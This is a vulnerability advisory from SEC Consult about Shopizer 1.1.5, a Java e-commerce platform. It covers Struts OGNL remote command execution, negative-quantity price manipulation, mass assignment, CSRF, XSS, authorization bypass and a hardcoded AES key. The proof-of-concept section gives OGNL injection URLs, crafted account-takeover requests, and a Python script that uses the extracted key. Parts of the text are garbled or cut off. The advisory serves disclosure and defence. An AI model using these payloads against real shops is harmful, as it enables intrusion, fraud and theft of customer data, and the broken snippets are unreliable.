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HistoryJul 12, 2014 - 12:00 a.m.

Shopizer 1.1.5 Multiple Vulnerability


Shopizer version 1.1.5 suffers from remote command execution, cross site request forgery, cross site scripting, data manipulation , authorization bypass and hardcoded key vulnerabilities.

title: Multiple critical vulnerabilities in Shopizer webshop
            product: Shopizer
 vulnerable version: 1.1.5 and below
      fixed version: v2 (new codebase)
             impact: critical
              found: 2012-01-10
                 by: Johannes Dahse, Johannes Greil
                     SEC Consult Vulnerability Lab

Vendor description:
- -------------------
Shopizer is an open source java shopping cart and e-commerce content
management software (CMS). The system is built on Struts 2, Hibernate and
Spring. JQuery ui and ajax are heavily used on the ui as well as DWR and
Struts2-jQuery plug-in. (

Vulnerability overview/description:
- -----------------------------------
Shopizer is prone to at least the following vulnerabilities, some of them are highly

1.) Remote Command Execution

Shopizer 1.1.5 is using Apache Struts and is thus vulnerable to Remote
Command Execution. Shopizer 1.1.3 and below is built on Apache Struts 2.1.6
and is also affected.

Fore more details please refer to:

This affects the shop and admin interface (central).

2.) Manipulation of product prices

When buying products in Shopizer the product costs for a single product is
calculated by the selected quantity times the price of the product. The
total costs of all products is the adding of all product costs. An attacker
can specify negative quantities to decrease the total costs.

This affects the shop.

3.) Manipulation of customer data / mass assignment

An attacker can change the contact details of a customer by modifying the
customerId in the change request. In example this allows him to modify the
shipping address to retrieve products bought by another customer.

Furthermore, a malicious admin user (sm-central) is able to change the
passwords of other user accounts by appending a "customer.customerPassword"
HTTP parameter when saving user details. This is possible _although_ there
is no UI (form field) for this within the admin interface.

This affects the shop and admin interface (central).

4.) Cross-Site Request Forgery

Modifying customer data is also prone to CSRF attacks. Additionally, the
attacker can change customer passwords, shop configuration, product details
and product prices by sending CSRF requests to the administration interface.

This affects the shop and admin interface (central).

5.) Missing anti brute force protection

No protection against brute force attacks regarding login credentials is
implemented. Attackers can guess for weak passwords of users, as the
password policy of the shop only allows exactly between 6 and 8 characters.
The use of special chars or digits is not being enforced.

This affects the shop and admin interface (central).

6.) Cross-Site Scripting

The Shopizer Admin Interface suffers from multiple reflected XSS

Proof of concept:
- -----------------
1.) Remote Command Execution in Struts

a) Via exception

The following URL will trigger an exception for an invalid "productId" data
type and Struts will re-evaluate the specified value as OGNL expression. An
attacker can successfully bypass security restrictions of Struts and execute
arbitrary Java code, leading to Remote Command Execution.
  /shop/product/reviews.action?product.productId=secconsult'%2b(%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23_memberAccess["allowStaticMethodAccess"]=true,@[email protected]().exec('calc'))%2b'

Other numeric parameters are affected as well.

b) Via ParameterInterceptor

The following URL will store a OGNL expression in the property "search" of
type String. This OGNL expression can then be accessed by a dynamic function
call in another parameter leading to Remote Command Execution.
  /shop/search.action?search=(%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23_memberAccess["allowStaticMethodAccess"]=true,@[email protected]().exec('calc'))(secconsult)&z[(search)('secconsult')]=true

2.) Manipulation of product prices

Assuming the shop has a product1 (300$) and a product2 (290$) for the total
costs of 590$. The following steps can be reproduced by a malicious user to
decrease the total costs when buying those products:

  a) Add product1 and product2 to the shopping cart
  b) Go to the shopping cart and press "recalculate"
  c) Intercept the ajax DWR request and modify the number reference of the
     parameter "productQuantity" for product2 to a negative value (-1):

    c0-e1=Object_Object:{productId:reference:c0-e3, productQuantity:reference:c0-e4}

  d) The new costs for product2 now recalculate to: -1 x 290 = -290$
  e) the new total costs is: product1 + product2 = 300$ + (-290$) = 10$
  f) continue shopping and pay 10$ for products worth 590$.

This is especially critical for shops that only provide digital products.

Furthermore, during the second step of the checkout process it is
possible to add a negative quantity of products exploiting a Shopizer's
feature called "standalone shopping cart". This results in a negative price.
By issuing the following specially crafted request in the separate tab of
the web browser, while the first tab contains the second step of the checkout
process, the total price will be decreased. Note that the page must be
refreshed after the request to reflect the changes.


3.) Manipulation of customer data / mass assignment

It's possible to overwrite user data of an arbitrary
user and gain access to his account and personal information _when
registering a new user_.
To achieve this, a malicious user has to add the customer.customerId
parameter to the HTTP request and specify the value of the parameter
to match the target user e.g. 87 when registering a new user.
For example, the following request will overwrite the user data
including username and password of the user with the ID 87.

  POST /shop/profile/register.action HTTP/1.1
  [...][email protected]&customer.customerCountryId=14&customer.customerZoneId=95&customer.customerPostalCode=SecTest&customer.customerCity=SecTest&customer.customerStreetAddress=SecTest&customer.customerHouseAddress=SecTest&captcha_honeypot=&customer.customerPrivacyRules=1&customer.customerId=87

In this case no account confirmation is needed. Instant access
to the overwritten account and its data is possible using the
new username SecTest and the newly specified password! An attacker is able to
access sensitive data (order information,
personal information etc.).

Additionally, the following request will overwrite the contact data of customer id 10,
including the name, shipping address and billing address:
  /shop/profile/changeAddress.action?formstate=list&customer.customerId=10&customer.customerCompany=secconsult&customer.customerGender=&customer.customerTitel=&customer.customerFirstname=secconsult&customer.customerLastname=secconsult&customer.customerTelephone=00&[email protected]&customer.customerCountryId=14&customer.customerZoneId=95&customer.customerPostalCode=1190&customer.customerCity=secconsult&customer.customerStreetAddress=secconsult&customer.customerHouseAddress=17&customer.customerAnonymous=false&customer.customerBillingTitel=&customer.customerBillingFirstName=secconsult&customer.customerBillingLastName=secconsult&customer.customerBillingStreetAddress=secconsult&customer.customerBillingHouseAddress=17&customer.customerBillingCity=secconsult&customer.customerBillingZoneId=95&customer.customerBillingState=secconsult&customer.customerBillingPostalCode=1190&customer.customerBillingCountryId=14&customer.customerLang=de&customer.customerPrivacyRul

Note that in this specific case the account of the attacker and the victim will not
be able to login again after the attack, because the nickname will be
overwritten and found twice during login.

Furthermore, the administration interface does not offer a UI to change user
passwords. By appending the parameter "customer.customerPassword" an attacker
is able to change the password of arbitrary users within the customer details

4.) Cross-Site Request Forgery

The following image will alter the product price for the product 30 when
rendered by the browser of an logged in webshop administrator:


Furthermore, the parameter "__checkbox_product.productIsFree" can also be set
to "true".

Additionally, the administration interface allows to overwrite the password
hash of every customer which can also be exploited via CSRF.

The product review form is also vulnerable to Cross-Site Request Forgery
attacks. A similar request to the following URL will result in a product
review being posted in the context of the currently logged in user. Note
that the URL does not contain any parameter that is holding a nonce value.


5.) Missing anti brute force protection

No proof-of-concept is necessary. See source:
Line 525 - 530 of shopizer 1.1.5

6.) Cross-Site Scripting


E.g. source code:

Vulnerability overview/description:
Shopizer is prone to the following high risk vulnerabilities:

1) Authentication/authorization bypass

The authentication and authorization mechanism provided by the web application
is prone to an authentication/authorization bypass vulnerability, which can be
easily exploited by remote attackers for gaining access to private
information. Malicious actions can be performed by directly calling internal
methods which are supposed to be accessed only by authenticated and permitted

2) Hardcoded default encryption key

A default encryption key is used across all versions of the Shopizer. It can't
be changed, for example, by editing a configuration file, because it's
hardcoded in the source code of the web application. The default encryption
key can be used to encrypt special values allowing access to the sensitive

Proof of concept:
1) Authentication/authorization bypass

The viewFiles method is vulnerable to authentication bypass. By changing the
value of the orderId parameter (e.g. by incrementing it) it is possible to
access and download ordered files of other users. This means that a malicious
user can completely bypass the checkout process and even he doesn't need an
account in order to gain access to the data that is sold on the target
website. In the following example files of the order with the ID 61 will be


The removeReview method is vulnerable to authorization bypass. An
authenticated user can remove arbitrary product reviews by changing the value
of the reviewId parameter (e.g. by incrementing it). The following URL will
remove the product review with the ID 398.


2) Hardcoded default encryption key

The hardcoded default encryption key is 1000000000000000
( and the default initialization vector is
fedcba9876543210 ( Both values were extracted from the
publicly available versions of the Shopizer. The following is the source code
of a Python script that can be used to decrypt and encrypt arbitrary values by
using the extracted keys.

from Crypto.Cipher import AES
from binascii import unhexlify
import sys

size = AES.block_size

pad = lambda s: s + (size - len(s) % size) * chr(size - len(s) % size)

def decrypt(ciphertext):
    decryptor ='1000000000000000', mode,'fedcba9876543210')
    plain = decryptor.decrypt(ciphertext)
    print repr(plain)

def encrypt(plaintext):
    encryptor ='1000000000000000', mode,'fedcba9876543210')
    plain = encryptor.encrypt(sample)
    print plain.encode('hex')

if __name__=='__main__':
    if len(sys.argv)<3:
        print "Usage: %s encrypt|decrypt text" % sys.argv[0]
    elif sys.argv[1]=='decrypt':
    elif sys.argv[1]=='encrypt':

The tool can be used to gain access to the invoices of other users. The
prepareSimpleInvoice action takes encrypted value of the order number that is
incremental. For example, to gain access to the invoice of the 57 order the
57|0 string must be encrypted:

C:\>python encrypt "57|0"

The encrypted string is then used as a value for the fileId parameter of the
following URL:


Other parts of the web application such as passwords and ordered files also
depend on the same encryption keys. If an attacker is able to gain access to
the database where encrypted user credentials are stored, he can easily
decrypt and use them in the further attacks.

Vulnerable / tested versions:
The vulnerabilities have been verified to exist in version 1.1.5 of Shopizer,
which is the most recent version at the time of discovery.

- ---------
Using the old version branch 1.x is not recommended as there are no security
fixes implemented by the vendor.

# [2018-04-08]  #